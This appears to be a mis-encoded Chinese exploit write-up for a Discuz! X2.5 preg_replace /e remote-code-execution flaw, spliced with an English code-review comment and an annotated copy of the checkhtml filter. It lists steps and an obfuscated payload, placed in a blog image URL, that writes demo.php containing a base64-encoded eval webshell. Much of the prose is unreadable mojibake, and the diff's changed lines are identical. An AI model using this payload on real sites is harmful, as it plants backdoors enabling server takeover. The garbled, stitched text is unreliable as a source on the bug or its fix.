DZ2.5 0day©exp

©⣺ Discuz!X2.5Release20120407ִ 
©ļupload\source\class\helper\helper_seo.php
 ں̨ˣǰ̨ͨݽִ
 ͼϴ Ŀ
 
 
 


 
 

PS: Discuz!ǿԴƷͨԱȵֶҵǰ⣬ϣصվ
 '---------------------------------------------------------------------------------------------------
 
if(!defined(IN_DISCUZ)) {
 @@ -89,7 +89,7 @@
 }
 }
 if($searcharray && $replacearray) {
 - $content = preg_replace(/(.*?)|()|(\[attach\](\d+)\[\/attach\])/ies, helper_seo::base64_transform(encode, , \\1\\2\\3, ), $content);
 + $content = preg_replace(/(.*?)|()|(\[attach\](\d+)\[\/attach\])/ies, helper_seo::base64_transform(encode, , \\1\\2\\3, ), $content);
 $content = preg_replace($searcharray, $replacearray, $content, 1);
 $content = preg_replace(/(.*?)/ies, helper_seo::base64_transform(decode, , \\1, ), $content);
 }
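Review bot: The new-side `preg_replace` call still carries the `e` modifier (`/ies`), so the `\\1\\2\\3` back-references taken from post content are interpolated into a PHP expression string that is then evaluated; the quoting change to `base64_transform` in the second hunk (`@@ -100,7 +100,7 @@`) only narrows what can break out of that string and leaves the evaluation in place, and the decode call on the following context line uses the same `/ies` construct. The `-`/`+` lines here read identically, so the actual textual change was most likely lost when quotes were stripped from this listing. The durable fix is to remove `e` and use `preg_replace_callback` with a callback that calls `helper_seo::base64_transform('encode', '', $m[1].$m[2].$m[3], '')` (and likewise `'decode'` for the second call), so captured text is passed as data rather than compiled; the `e` modifier is deprecated in PHP 5.5 and removed in 7.0, which makes this change necessary anyway. The enclosing function begins before this hunk.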
 @@ -100,7 +100,7 @@///www.hake.cc
 
public static function base64_transform($type, $prefix, $string, $suffix) {
 if($type == encode) {
 - return $prefix.base64_encode(str_replace(\, , $string)).$suffix; // C -
 + return $prefix.base64_encode(str_replace(\\\", \", $string)).$suffix;
 } elseif($type == decode) {
 return $prefix.base64_decode($string).$suffix;
 }
 ɣ/source/class/helper/helper_seo.php 92иģ
 $content = preg_replace(/(.*?)|()|(\[attach\](\d+)\[\/attach\])/ies, helper_seo::base64_transform(encode, , \\1\\2\\3, ), $content);
 preg_replace ʹe˫ţԵԶִС
 Ҫָ̳֧ܣɶܿ68 $_G['cache']['relatedlink']greprelatedlinkһ·ȲҵҪ̨seoܣӪ- /admin.php?frames=yes&action=misc&operation=relatedlinkҪһӣ⹦ܲйԱҾô󲿷ֶῪֻǸ̨shelltipsˡ
 function_core.php 1925
 /**
  * Global-function facade over helper_seo::parse_related_link().
  *
  * Kept so existing callers in function_core.php need not reference the
  * helper class directly; both arguments are forwarded unchanged.
  *
  * @param string $content Text to process.
  * @param mixed  $extent  Passed through to the helper as given.
  * @return mixed Whatever helper_seo::parse_related_link() returns.
  */
 function parse_related_link($content, $extent) {
 	$processed = helper_seo::parse_related_link($content, $extent);
 	return $processed;
 }
 
 
/(.*?)|()|(\[attach\](\d+)\[\/attach\])/ies
 

PS Ӱ汾УDiscuz!X2.5Release20120407betarc ִ 
1.ע˻ 
2.½ûblog־ע־ 
3.ͼƬѡͼƬַ{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}} 
4.־̳Ŀ¼demo.phpһ䷢c
 


ô÷ʽ˵ô ֵط source/include/space/space_blog.php  checkhtml 
 ͬشṩҴţο ţҪDСվ վֻǷ D һD͹
 
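/**
 * Escape user-submitted HTML for accounts without the 'allowhtml' permission.
 *
 * Every angle bracket in $html is first turned into an entity; afterwards each
 * tag that was present is restored only if its name is on the allow-list below,
 * and then with its text entity-escaped and a blacklist of script/event words
 * blanked out. Users who hold 'allowhtml' get the input back untouched.
 *
 * Depends on two project helpers defined elsewhere: checkperm() and
 * dhtmlspecialchars().
 *
 * @param string $html HTML fragment as submitted by the user.
 * @return string The fragment with disallowed tags rendered as entities.
 */
function checkhtml($html) {
        if(!checkperm('allowhtml')) {
                // Collect the text of every "<...>" run; $ms[1] holds the inner text.
                preg_match_all("/\<([^\<]+)\>/is", $html, $ms);

                // Step 1: neutralise every angle bracket. NOTE(review): the listing as
                // extracted showed these literals already entity-decoded ('<' => '<'),
                // which would make the replacement a no-op; the entity forms are what
                // make this function escape anything at all.
                $searchs = array('<', '>');
                $replaces = array('&lt;', '&gt;');

                if(!empty($ms[1])) {
                        $allowtags = 'img|a|font|div|table|tbody|caption|tr|td|th|br|p|b|strong|i|u|em|span|ol|ul|li|blockquote|object|param|embed';

                        // Loop-invariant: the blacklist pattern is built once, not per tag.
                        $skipkeys = array('onabort','onactivate','onafterprint','onafterupdate','onbeforeactivate','onbeforecopy','onbeforecut','onbeforedeactivate',
                                        'onbeforeeditfocus','onbeforepaste','onbeforeprint','onbeforeunload','onbeforeupdate','onblur','onbounce','oncellchange','onchange',
                                        'onclick','oncontextmenu','oncontrolselect','oncopy','oncut','ondataavailable','ondatasetchanged','ondatasetcomplete','ondblclick',
                                        'ondeactivate','ondrag','ondragend','ondragenter','ondragleave','ondragover','ondragstart','ondrop','onerror','onerrorupdate',
                                        'onfilterchange','onfinish','onfocus','onfocusin','onfocusout','onhelp','onkeydown','onkeypress','onkeyup','onlayoutcomplete',
                                        'onload','onlosecapture','onmousedown','onmouseenter','onmouseleave','onmousemove','onmouseout','onmouseover','onmouseup','onmousewheel',
                                        'onmove','onmoveend','onmovestart','onpaste','onpropertychange','onreadystatechange','onreset','onresize','onresizeend','onresizestart',
                                        'onrowenter','onrowexit','onrowsdelete','onrowsinserted','onscroll','onselect','onselectionchange','onselectstart','onstart','onstop',
                                        'onsubmit','onunload','javascript','script','eval','behaviour','e-xpression','style','class');
                        $skippattern = "/(".implode('|', $skipkeys).")/i";

                        foreach (array_unique($ms[1]) as $value) {
                                // Step 2: after step 1 this tag reads "&lt;...&gt;" in $html,
                                // so that escaped form is the text to search for when restoring it.
                                $searchs[] = "&lt;".$value."&gt;";

                                // Entity-escape the tag text while keeping pre-existing '&'
                                // as-is (presumably so dhtmlspecialchars() does not re-encode
                                // entities already present — verify against that helper).
                                $value = str_replace('&', '_uch_tmp_str_', $value);
                                $value = dhtmlspecialchars($value);
                                $value = str_replace('_uch_tmp_str_', '&', $value);

                                // Break backslash escapes and CSS comment openers.
                                $value = str_replace(array('\\','/*'), array('.','/.'), $value);
                                // Plain substring blacklist: any listed word, anywhere in the
                                // tag text (not only in attribute-name position), becomes '.'.
                                $value = preg_replace($skippattern, '.', $value);

                                // Drop the tag entirely unless its name is on the allow-list
                                // (an optional leading '/' admits the closing form).
                                if(!preg_match("/^[\/|\s]?($allowtags)(\s+|$)/is", $value)) {
                                        $value = '';
                                }

                                // Allowed tags come back as real markup with quotes entity-encoded;
                                // disallowed ones are replaced by the empty string.
                                $replaces[] = empty($value) ? '' : "<".str_replace('"', '&quot;', $value).">";
                        }
                }

                // str_replace with arrays applies the pairs in order: the bracket escaping
                // first, then each allowed tag restored from its escaped form.
                $html = str_replace($searchs, $replaces, $html);
        }

        return $html;
}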
 


